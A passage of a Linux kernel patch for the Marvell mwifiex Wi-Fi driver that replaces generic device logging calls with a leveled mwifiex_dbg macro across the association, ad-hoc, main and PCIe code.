cpu_to_le16(tmp_cap); return 0; @@ -645,9 +650,11 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, if (status_code) { priv->adapter->dbg.num_cmd_assoc_failure++; - dev_err(priv->adapter->dev, - "ASSOC_RESP: failed, status code=%d err=%#x a_id=%#x\n", - status_code, cap_info, le16_to_cpu(assoc_rsp->a_id)); + mwifiex_dbg(priv->adapter, ERROR, + "ASSOC_RESP: failed,\t" + "status code=%d err=%#x a_id=%#x\n", + status_code, cap_info, + le16_to_cpu(assoc_rsp->a_id)); if (cap_info == MWIFIEX_TIMEOUT_FOR_AP_RESP) { if (status_code == MWIFIEX_STATUS_CODE_AUTH_TIMEOUT) @@ -671,8 +678,8 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, /* Set the attempted BSSID Index to current */ bss_desc = priv->attempted_bss_desc; - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_RESP: %s\n", + bss_desc->ssid.ssid); /* Make a copy of current BSSID descriptor */ memcpy(&priv->curr_bss_params.bss_descriptor, @@ -702,8 
+709,9 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, = ((bss_desc->wmm_ie.qos_info_bitmap & IEEE80211_WMM_IE_AP_QOSINFO_UAPSD) ? 1 : 0); - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: curr_pkt_filter is %#x\n", - priv->curr_pkt_filter); + mwifiex_dbg(priv->adapter, INFO, + "info: ASSOC_RESP: curr_pkt_filter is %#x\n", + priv->curr_pkt_filter); if (priv->sec_info.wpa_enabled || priv->sec_info.wpa2_enabled) priv->wpa_is_gtk_set = false; @@ -719,8 +727,8 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, } if (enable_data) - dev_dbg(priv->adapter->dev, - "info: post association, re-enabling data flow\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: post association, re-enabling data flow\n"); /* Reset SNR/NF/RSSI values */ priv->data_rssi_last = 0; @@ -738,7 +746,7 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, priv->adapter->dbg.num_cmd_assoc_success++; - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: associated\n"); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_RESP: associated\n"); /* Add the ra_list here for infra mode as there will be only 1 ra always */ @@ -825,8 +833,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, memcpy(adhoc_start->ssid, req_ssid->ssid, req_ssid->ssid_len); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: SSID = %s\n", - adhoc_start->ssid); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: SSID = %s\n", + adhoc_start->ssid); memset(bss_desc->ssid.ssid, 0, IEEE80211_MAX_SSID_LEN); memcpy(bss_desc->ssid.ssid, req_ssid->ssid, req_ssid->ssid_len); @@ -858,12 +866,14 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, } if (!priv->adhoc_channel) { - dev_err(adapter->dev, "ADHOC_S_CMD: adhoc_channel cannot be 0\n"); + mwifiex_dbg(adapter, ERROR, + "ADHOC_S_CMD: adhoc_channel cannot be 0\n"); return -1; } - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: creating ADHOC on channel %d\n", - priv->adhoc_channel); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: creating ADHOC on channel %d\n", + priv->adhoc_channel); priv->curr_bss_params.bss_descriptor.channel = priv->adhoc_channel; priv->curr_bss_params.band = adapter->adhoc_start_band; @@ -895,13 +905,14 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, /* Set up privacy in bss_desc */ if (priv->sec_info.encryption_mode) { /* Ad-Hoc capability privacy on */ - dev_dbg(adapter->dev, - "info: ADHOC_S_CMD: wep_status set privacy to WEP\n"); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: wep_status set privacy to WEP\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_8021X_WEP; tmp_cap |= WLAN_CAPABILITY_PRIVACY; } else { - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: wep_status NOT set," - " setting privacy to ACCEPT ALL\n"); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: wep_status NOT set,\t" + "setting privacy to ACCEPT ALL\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_ACCEPT_ALL; } @@ -912,8 +923,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, 0, &priv->curr_pkt_filter, false)) { - dev_err(adapter->dev, - "ADHOC_S_CMD: G Protection config failed\n"); + mwifiex_dbg(adapter, ERROR, + "ADHOC_S_CMD: G Protection config failed\n"); return -1; } } @@ -928,10 +939,10 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, memcpy(&priv->curr_bss_params.data_rates, &adhoc_start->data_rate, priv->curr_bss_params.num_of_rates); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: rates=%4ph\n", - adhoc_start->data_rate); + 
mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: rates=%4ph\n", + adhoc_start->data_rate); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: AD-HOC Start command is ready\n"); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: AD-HOC Start command is ready\n"); if (IS_SUPPORT_MULTI_BANDS(adapter)) { /* Append a channel TLV */ @@ -945,8 +956,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, chan_tlv->chan_scan_param[0].chan_number = (u8) priv->curr_bss_params.bss_descriptor.channel; - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: TLV Chan = %d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: TLV Chan = %d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type(priv->curr_bss_params.band); @@ -961,8 +972,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, chan_tlv->chan_scan_param[0].radio_type |= (IEEE80211_HT_PARAM_CHA_SEC_BELOW << 4); } - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: TLV Band = %d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: TLV Band = %d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); cmd_append_size += @@ -1084,8 +1095,8 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, 0, &curr_pkt_filter, false)) { - dev_err(priv->adapter->dev, - "ADHOC_J_CMD: G Protection config failed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "ADHOC_J_CMD: G Protection config failed\n"); return -1; } } @@ -1116,14 +1127,15 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, tmp_cap &= CAPINFO_MASK; - dev_dbg(priv->adapter->dev, - "info: ADHOC_J_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", - tmp_cap, CAPINFO_MASK); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", + tmp_cap, CAPINFO_MASK); /* Information on BSSID descriptor passed to FW */ - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: BSSID=%pM, SSID='%s'\n", - adhoc_join->bss_descriptor.bssid, - adhoc_join->bss_descriptor.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: BSSID=%pM, SSID='%s'\n", + adhoc_join->bss_descriptor.bssid, + adhoc_join->bss_descriptor.ssid); for (i = 0; i < MWIFIEX_SUPPORTED_RATES && bss_desc->supported_rates[i]; i++) @@ -1159,14 +1171,14 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, sizeof(struct mwifiex_chan_scan_param_set)); chan_tlv->chan_scan_param[0].chan_number = (bss_desc->phy_param_set.ds_param_set.current_chan); - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: TLV Chan=%d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_J_CMD: TLV Chan=%d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type((u8) bss_desc->bss_band); - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: TLV Band=%d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_J_CMD: TLV Band=%d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); cmd_append_size += sizeof(chan_tlv->header) + @@ -1220,7 +1232,7 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, /* Join result code 0 --> SUCCESS */ reason_code = le16_to_cpu(resp->result); if (reason_code) { - dev_err(priv->adapter->dev, "ADHOC_RESP: 
failed\n"); + mwifiex_dbg(priv->adapter, ERROR, "ADHOC_RESP: failed\n"); if (priv->media_connected) mwifiex_reset_connect_state(priv, reason_code); @@ -1235,8 +1247,8 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, priv->media_connected = true; if (le16_to_cpu(resp->command) == HostCmd_CMD_802_11_AD_HOC_START) { - dev_dbg(priv->adapter->dev, "info: ADHOC_S_RESP %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_S_RESP %s\n", + bss_desc->ssid.ssid); /* Update the created network descriptor with the new BSSID */ memcpy(bss_desc->mac_address, @@ -1248,8 +1260,9 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, * Now the join cmd should be successful. * If BSSID has changed use SSID to compare instead of BSSID */ - dev_dbg(priv->adapter->dev, "info: ADHOC_J_RESP %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_RESP %s\n", + bss_desc->ssid.ssid); /* * Make a copy of current BSSID descriptor, only needed for @@ -1262,10 +1275,10 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, priv->adhoc_state = ADHOC_JOINED; } - dev_dbg(priv->adapter->dev, "info: ADHOC_RESP: channel = %d\n", - priv->adhoc_channel); - dev_dbg(priv->adapter->dev, "info: ADHOC_RESP: BSSID = %pM\n", - priv->curr_bss_params.bss_descriptor.mac_address); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_RESP: channel = %d\n", + priv->adhoc_channel); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_RESP: BSSID = %pM\n", + priv->curr_bss_params.bss_descriptor.mac_address); if (!netif_carrier_ok(priv->netdev)) netif_carrier_on(priv->netdev); @@ -1327,12 +1340,12 @@ int mwifiex_adhoc_start(struct mwifiex_private *priv, struct cfg80211_ssid *adhoc_ssid) { - dev_dbg(priv->adapter->dev, "info: Adhoc Channel = %d\n", - priv->adhoc_channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.channel = %d\n", - priv->curr_bss_params.bss_descriptor.channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.band = %d\n", - priv->curr_bss_params.band); + mwifiex_dbg(priv->adapter, INFO, "info: Adhoc Channel = %d\n", + priv->adhoc_channel); + mwifiex_dbg(priv->adapter, INFO, "info: curr_bss_params.channel = %d\n", + priv->curr_bss_params.bss_descriptor.channel); + mwifiex_dbg(priv->adapter, INFO, "info: curr_bss_params.band = %d\n", + priv->curr_bss_params.band); if (ISSUPP_11ACENABLED(priv->adapter->fw_cap_info) && priv->adapter->config_bands & BAND_AAC) @@ -1353,14 +1366,16 @@ mwifiex_adhoc_start(struct mwifiex_private *priv, int mwifiex_adhoc_join(struct mwifiex_private *priv, struct mwifiex_bssdescriptor *bss_desc) { - dev_dbg(priv->adapter->dev, "info: adhoc join: curr_bss ssid =%s\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid); - dev_dbg(priv->adapter->dev, "info: adhoc join: curr_bss ssid_len =%u\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid_len); - dev_dbg(priv->adapter->dev, "info: adhoc join: ssid =%s\n", - bss_desc->ssid.ssid); - dev_dbg(priv->adapter->dev, "info: adhoc join: ssid_len =%u\n", - bss_desc->ssid.ssid_len); + mwifiex_dbg(priv->adapter, INFO, + "info: adhoc join: curr_bss ssid =%s\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: adhoc join: curr_bss ssid_len =%u\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid_len); + mwifiex_dbg(priv->adapter, INFO, "info: adhoc join: ssid =%s\n", + bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: adhoc join: ssid_len =%u\n", + bss_desc->ssid.ssid_len); /* Check if the requested SSID is already joined */ 
if (priv->curr_bss_params.bss_descriptor.ssid.ssid_len && @@ -1368,8 +1383,9 @@ int mwifiex_adhoc_join(struct mwifiex_private *priv, &priv->curr_bss_params.bss_descriptor.ssid) && (priv->curr_bss_params.bss_descriptor.bss_mode == NL80211_IFTYPE_ADHOC)) { - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: new ad-hoc SSID" - " is the same as current; not attempting to re-join\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: new ad-hoc SSID\t" + "is the same as current; not attempting to re-join\n"); return -1; } @@ -1380,10 +1396,12 @@ int mwifiex_adhoc_join(struct mwifiex_private *priv, else mwifiex_set_ba_params(priv); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.channel = %d\n", - priv->curr_bss_params.bss_descriptor.channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.band = %c\n", - priv->curr_bss_params.band); + mwifiex_dbg(priv->adapter, INFO, + "info: curr_bss_params.channel = %d\n", + priv->curr_bss_params.bss_descriptor.channel); + mwifiex_dbg(priv->adapter, INFO, + "info: curr_bss_params.band = %c\n", + priv->curr_bss_params.band); return mwifiex_send_cmd(priv, HostCmd_CMD_802_11_AD_HOC_JOIN, HostCmd_ACT_GEN_SET, 0, bss_desc, true); diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index eca4378eddda..138c1cccf7d3 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -94,7 +94,8 @@ static int mwifiex_register(void *card, struct mwifiex_if_ops *if_ops, return 0; error: - dev_dbg(adapter->dev, "info: leave mwifiex_register with error\n"); + mwifiex_dbg(adapter, ERROR, + "info: leave mwifiex_register with error\n"); for (i = 0; i < adapter->priv_num; i++) kfree(adapter->priv[i]); @@ -459,8 +460,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) struct wireless_dev *wdev; if (!firmware) { - dev_err(adapter->dev, - "Failed to get firmware %s\n", adapter->fw_name); + mwifiex_dbg(adapter, ERROR, + "Failed to get firmware %s\n", adapter->fw_name); goto err_dnld_fw; } @@ -476,13 +477,13 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) if (ret == -1) goto err_dnld_fw; - dev_notice(adapter->dev, "WLAN FW is active\n"); + mwifiex_dbg(adapter, MSG, "WLAN FW is active\n"); if (cal_data_cfg) { if ((request_firmware(&adapter->cal_data, cal_data_cfg, adapter->dev)) < 0) - dev_err(adapter->dev, - "Cal data request_firmware() failed\n"); + mwifiex_dbg(adapter, ERROR, + "Cal data request_firmware() failed\n"); } /* enable host interrupt after fw dnld is successful */ @@ -507,12 +508,14 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) priv = adapter->priv[MWIFIEX_BSS_ROLE_STA]; if (mwifiex_register_cfg80211(adapter)) { - dev_err(adapter->dev, "cannot register with cfg80211\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register with cfg80211\n"); goto err_init_fw; } if (mwifiex_init_channel_scan_gap(adapter)) { - dev_err(adapter->dev, "could not init channel stats table\n"); + mwifiex_dbg(adapter, ERROR, + "could not init channel stats table\n"); goto err_init_fw; } @@ -526,7 +529,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) wdev = mwifiex_add_virtual_intf(adapter->wiphy, "mlan%d", NET_NAME_ENUM, NL80211_IFTYPE_STATION, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, "cannot create default STA interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create default STA interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -535,7 +539,8 @@ static void mwifiex_fw_dpc(const 
struct firmware *firmware, void *context) wdev = mwifiex_add_virtual_intf(adapter->wiphy, "uap%d", NET_NAME_ENUM, NL80211_IFTYPE_AP, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, "cannot create AP interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create AP interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -546,8 +551,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) NL80211_IFTYPE_P2P_CLIENT, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, - "cannot create p2p client interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create p2p client interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -555,7 +560,7 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) rtnl_unlock(); mwifiex_drv_get_driver_version(adapter, fmt, sizeof(fmt) - 1); - dev_notice(adapter->dev, "driver_version = %s\n", fmt); + mwifiex_dbg(adapter, MSG, "driver_version = %s\n", fmt); goto done; err_add_intf: @@ -565,7 +570,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) if (adapter->if_ops.disable_int) adapter->if_ops.disable_int(adapter); err_dnld_fw: - pr_debug("info: %s: unregister device\n", __func__); + mwifiex_dbg(adapter, ERROR, + "info: %s: unregister device\n", __func__); if (adapter->if_ops.unregister_dev) adapter->if_ops.unregister_dev(adapter); @@ -606,8 +612,8 @@ static int mwifiex_init_hw_fw(struct mwifiex_adapter *adapter) adapter->dev, GFP_KERNEL, adapter, mwifiex_fw_dpc); if (ret < 0) - dev_err(adapter->dev, - "request_firmware_nowait() returned error %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "request_firmware_nowait error %d\n", ret); return ret; } @@ -633,7 +639,8 @@ mwifiex_close(struct net_device *dev) struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (priv->scan_request) { - dev_dbg(priv->adapter->dev, "aborting scan on ndo_stop\n"); + mwifiex_dbg(priv->adapter, INFO, + "aborting scan on ndo_stop\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; priv->scan_aborting = true; @@ -654,7 +661,8 @@ int mwifiex_queue_tx_pkt(struct mwifiex_private *priv, struct sk_buff *skb) txq = netdev_get_tx_queue(priv->netdev, index); if (!netif_tx_queue_stopped(txq)) { netif_tx_stop_queue(txq); - dev_dbg(priv->adapter->dev, "stop queue: %d\n", index); + mwifiex_dbg(priv->adapter, DATA, + "stop queue: %d\n", index); } } @@ -719,8 +727,9 @@ mwifiex_hard_start_xmit(struct sk_buff *skb, struct net_device *dev) struct mwifiex_txinfo *tx_info; bool multicast; - dev_dbg(priv->adapter->dev, "data: %lu BSS(%d-%d): Data <= kernel\n", - jiffies, priv->bss_type, priv->bss_num); + mwifiex_dbg(priv->adapter, DATA, + "data: %lu BSS(%d-%d): Data <= kernel\n", + jiffies, priv->bss_type, priv->bss_num); if (priv->adapter->surprise_removed) { kfree_skb(skb); @@ -728,28 +737,31 @@ mwifiex_hard_start_xmit(struct sk_buff *skb, struct net_device *dev) return 0; } if (!skb->len || (skb->len > ETH_FRAME_LEN)) { - dev_err(priv->adapter->dev, "Tx: bad skb len %d\n", skb->len); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: bad skb len %d\n", skb->len); kfree_skb(skb); priv->stats.tx_dropped++; return 0; } if (skb_headroom(skb) < MWIFIEX_MIN_DATA_HEADER_LEN) { - dev_dbg(priv->adapter->dev, - "data: Tx: insufficient skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, DATA, + "data: Tx: insufficient skb headroom %d\n", + skb_headroom(skb)); /* Insufficient skb headroom - allocate a new skb */ new_skb = skb_realloc_headroom(skb, MWIFIEX_MIN_DATA_HEADER_LEN); if (unlikely(!new_skb)) { 
- dev_err(priv->adapter->dev, "Tx: cannot alloca new_skb\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: cannot alloca new_skb\n"); kfree_skb(skb); priv->stats.tx_dropped++; return 0; } kfree_skb(skb); skb = new_skb; - dev_dbg(priv->adapter->dev, "info: new skb headroomd %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, INFO, + "info: new skb headroomd %d\n", + skb_headroom(skb)); } tx_info = MWIFIEX_SKB_TXCB(skb); @@ -807,8 +819,8 @@ mwifiex_set_mac_address(struct net_device *dev, void *addr) if (!ret) memcpy(priv->netdev->dev_addr, priv->curr_addr, ETH_ALEN); else - dev_err(priv->adapter->dev, - "set mac address failed: ret=%d\n", ret); + mwifiex_dbg(priv->adapter, ERROR, + "set mac address failed: ret=%d\n", ret); memcpy(dev->dev_addr, priv->curr_addr, ETH_ALEN); @@ -846,15 +858,17 @@ mwifiex_tx_timeout(struct net_device *dev) priv->num_tx_timeout++; priv->tx_timeout_cnt++; - dev_err(priv->adapter->dev, - "%lu : Tx timeout(#%d), bss_type-num = %d-%d\n", - jiffies, priv->tx_timeout_cnt, priv->bss_type, priv->bss_num); + mwifiex_dbg(priv->adapter, ERROR, + "%lu : Tx timeout(#%d), bss_type-num = %d-%d\n", + jiffies, priv->tx_timeout_cnt, priv->bss_type, + priv->bss_num); mwifiex_set_trans_start(dev); if (priv->tx_timeout_cnt > TX_TIMEOUT_THRESHOLD && priv->adapter->if_ops.card_reset) { - dev_err(priv->adapter->dev, - "tx_timeout_cnt exceeds threshold. Triggering card reset!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tx_timeout_cnt exceeds threshold.\t" + "Triggering card reset!\n"); priv->adapter->if_ops.card_reset(priv->adapter); } } @@ -875,7 +889,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = 0; } - dev_info(adapter->dev, "=== DRIVER INFO DUMP START===\n"); + mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP START===\n"); adapter->drv_info_dump = vzalloc(MWIFIEX_DRV_INFO_SIZE_MAX); @@ -963,7 +977,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } adapter->drv_info_size = p - adapter->drv_info_dump; - dev_info(adapter->dev, "=== DRIVER INFO DUMP END===\n"); + mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP END===\n"); } EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); @@ -1234,21 +1248,24 @@ int mwifiex_remove_card(struct mwifiex_adapter *adapter, struct semaphore *sem) } } - dev_dbg(adapter->dev, "cmd: calling mwifiex_shutdown_drv...\n"); + mwifiex_dbg(adapter, CMD, + "cmd: calling mwifiex_shutdown_drv...\n"); adapter->init_wait_q_woken = false; if (mwifiex_shutdown_drv(adapter) == -EINPROGRESS) wait_event_interruptible(adapter->init_wait_q, adapter->init_wait_q_woken); - dev_dbg(adapter->dev, "cmd: mwifiex_shutdown_drv done\n"); + mwifiex_dbg(adapter, CMD, + "cmd: mwifiex_shutdown_drv done\n"); if (atomic_read(&adapter->rx_pending) || atomic_read(&adapter->tx_pending) || atomic_read(&adapter->cmd_pending)) { - dev_err(adapter->dev, "rx_pending=%d, tx_pending=%d, " - "cmd_pending=%d\n", - atomic_read(&adapter->rx_pending), - atomic_read(&adapter->tx_pending), - atomic_read(&adapter->cmd_pending)); + mwifiex_dbg(adapter, ERROR, + "rx_pending=%d, tx_pending=%d,\t" + "cmd_pending=%d\n", + atomic_read(&adapter->rx_pending), + atomic_read(&adapter->tx_pending), + atomic_read(&adapter->cmd_pending)); } for (i = 0; i < adapter->priv_num; i++) { @@ -1268,11 +1285,13 @@ int mwifiex_remove_card(struct mwifiex_adapter *adapter, struct semaphore *sem) wiphy_free(adapter->wiphy); /* Unregister device */ - dev_dbg(adapter->dev, "info: unregister device\n"); + mwifiex_dbg(adapter, INFO, + "info: unregister device\n"); if 
(adapter->if_ops.unregister_dev) adapter->if_ops.unregister_dev(adapter); /* Free adapter structure */ - dev_dbg(adapter->dev, "info: free adapter\n"); + mwifiex_dbg(adapter, INFO, + "info: free adapter\n"); mwifiex_free_adapter(adapter); exit_remove: diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 88bda3f68164..7219243e9994 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -57,7 +57,7 @@ mwifiex_map_pci_memory(struct mwifiex_adapter *adapter, struct sk_buff *skb, mapping.addr = pci_map_single(card->dev, skb->data, size, flags); if (pci_dma_mapping_error(card->dev, mapping.addr)) { - dev_err(adapter->dev, "failed to map pci memory!\n"); + mwifiex_dbg(adapter, ERROR, "failed to map pci memory!\n"); return -1; } mapping.len = size; @@ -89,8 +89,9 @@ static bool mwifiex_pcie_ok_to_access_hw(struct mwifiex_adapter *adapter) if (card->sleep_cookie_vbase) { cookie_addr = (u32 *)card->sleep_cookie_vbase; - dev_dbg(adapter->dev, "info: ACCESS_HW: sleep cookie=0x%x\n", - *cookie_addr); + mwifiex_dbg(adapter, INFO, + "info: ACCESS_HW: sleep cookie=0x%x\n", + *cookie_addr); if (*cookie_addr == FW_AWAKE_COOKIE) return true; } @@ -164,7 +165,8 @@ static int mwifiex_pcie_resume(struct device *dev) adapter = card->adapter; if (!adapter->is_suspended) { - dev_warn(adapter->dev, "Device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "Device already resumed\n"); return 0; } @@ -361,16 +363,16 @@ static void mwifiex_delay_for_sleep_cookie(struct mwifiex_adapter *adapter, sleep_cookie = *(u32 *)buffer; if (sleep_cookie == MWIFIEX_DEF_SLEEP_COOKIE) { - dev_dbg(adapter->dev, - "sleep cookie found at count %d\n", count); + mwifiex_dbg(adapter, INFO, + "sleep cookie found at count %d\n", count); break; } usleep_range(20, 30); } if (count >= max_delay_loop_cnt) - dev_dbg(adapter->dev, - "max count reached while accessing sleep cookie\n"); + mwifiex_dbg(adapter, INFO, + "max count reached while accessing sleep cookie\n"); } /* This function wakes up the card by reading fw_status register. 
*/ @@ -380,20 +382,23 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) struct pcie_service_card *card = adapter->card; const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; - dev_dbg(adapter->dev, "event: Wakeup device...\n"); + mwifiex_dbg(adapter, EVENT, + "event: Wakeup device...\n"); if (reg->sleep_cookie) mwifiex_pcie_dev_wakeup_delay(adapter); /* Reading fw_status register will wakeup device */ if (mwifiex_read_reg(adapter, reg->fw_status, &fw_status)) { - dev_warn(adapter->dev, "Reading fw_status register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Reading fw_status register failed\n"); return -1; } if (reg->sleep_cookie) { mwifiex_pcie_dev_wakeup_delay(adapter); - dev_dbg(adapter->dev, "PCIE wakeup: Setting PS_STATE_AWAKE\n"); + mwifiex_dbg(adapter, INFO, + "PCIE wakeup: Setting PS_STATE_AWAKE\n"); adapter->ps_state = PS_STATE_AWAKE; } @@ -407,7 +412,8 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) */ static int mwifiex_pm_wakeup_card_complete(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "cmd: Wakeup device completed\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Wakeup device completed\n"); return 0; } @@ -423,7 +429,8 @@ static int mwifiex_pcie_disable_host_int(struct mwifiex_adapter *adapter) if (mwifiex_pcie_ok_to_access_hw(adapter)) { if (mwifiex_write_reg(adapter, PCIE_HOST_INT_MASK, 0x00000000)) { - dev_warn(adapter->dev, "Disable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "Disable host interrupt failed\n"); return -1; } } @@ -443,7 +450,8 @@ static int mwifiex_pcie_enable_host_int(struct mwifiex_adapter *adapter) /* Simply write the mask to the register */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_MASK, HOST_INTR_MASK)) { - dev_warn(adapter->dev, "Enable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "Enable host interrupt failed\n"); return -1; } } @@ -499,8 +507,8 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter) skb = mwifiex_alloc_dma_align_buf(MWIFIEX_RX_DATA_BUF_SIZE, GFP_KERNEL | GFP_DMA); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for RX ring.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for RX ring.\n"); kfree(card->rxbd_ring_vbase); return -ENOMEM; } @@ -512,10 +520,10 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb); - dev_dbg(adapter->dev, - "info: RX ring: skb=%p len=%d data=%p 